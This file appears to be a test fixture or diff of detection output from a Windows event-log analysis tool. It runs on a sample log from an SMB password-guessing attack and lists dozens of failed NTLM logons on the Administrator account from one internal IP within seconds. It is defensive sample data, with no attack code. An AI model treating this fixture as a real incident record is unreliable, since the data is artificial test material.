+2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ShGnRYHfVSuPvfcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LXVWG3Yl0utv98Zf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VDfa0UebgleQMK5U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxTLJJsWs9dOc5JC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7cKtymmsQJSM6zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbtC0srNyvkIHOSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPGlJ6ZjGSfUKrCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Uw95Ema8vWlRXKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hHTrBmhkjGLTNt2R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJeRVGKULJIo76aa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kipf0Z2Tse2eWoxa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnP7tmMJXDVzIDim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CBeMt62oqlIICShT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIfXRZQkKRJAw4er | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wrqSJPALo5QtUnS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81Mm67AdwpPJMCMm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jwq5jXlMRU1SNLO5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d7OYj8ynCEl5dG9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YzT8vF7ANYnjSRgd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4eYIoww4uL6oYZu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DpO8L2Fky4zYwp2q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGmxSy48sphENTiY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tQVAkjteLFK0hbyE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMWKsQ8l0j9fZPfA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ct7xYUYH9sr7mva | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBn0XxaPOZQokJ0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nQELRxrGuXqkYgO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5eT0mykgLNZQygq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qMyIqRidF6oBdzog | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ULnnFcF98k9zpNTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j5k02pcelZNGwF3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qfcC6LqJqs0EeGjE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXALYkkitmyAFq14 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIqQmExq22WrW4md | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ydHqjdZhLMI9gjfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSe45VZNPdovPbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hiHlcR6qNGE0P7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iT3jPdHr89RqPlyd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0QFnABeYK39XEntR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5plMYSBQi5mKmdlk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TaxWckQUCMgWvCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81xZ7iisEyTABmUm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qYiQ2xjMQFQwH2XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRN8e3yzZzxc2p3A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCa6PN0C7XznvipG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hFqjIXbEb7eWUFUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkrVjLgnJZlIyXpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2r5tyuIYijAXN5be | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AgjQNe9hQrLIETDn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNoInpFTsixZDIu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ladJUS6I0HMIwdef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oW63pJlVtjgn3YY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKNu8b2To2Y1twUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9sN5xm3GytfmM7G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtQQS61GYBm6WUUz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WxxawZZMhNCGHxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sKP8G2VgJlrr9LMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvOsNQpk3c5p1FgK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7oz7NPh5Z8UrDPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvzNFOLBlBv98Do4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KJmYytO30Icc6Rb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zro3jLjFXWZ2o8VL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Z2J8VYeuxd9fKcG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXMjOKLfMex7OmMv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgbm3YeoGxCa22Il | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7MEstBFjiWhVE18 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8Y2kDEiMZWf0znn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBAFVgPIOyCvtdRs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s3pFhUcspF6lzQXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39LFXXW715pQoADC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: in4ewyxouUnxQzCQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOtV8CLIU6Mcw2ty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8NJqimhGrg9uhTh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XEWLTOY9magV0h6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
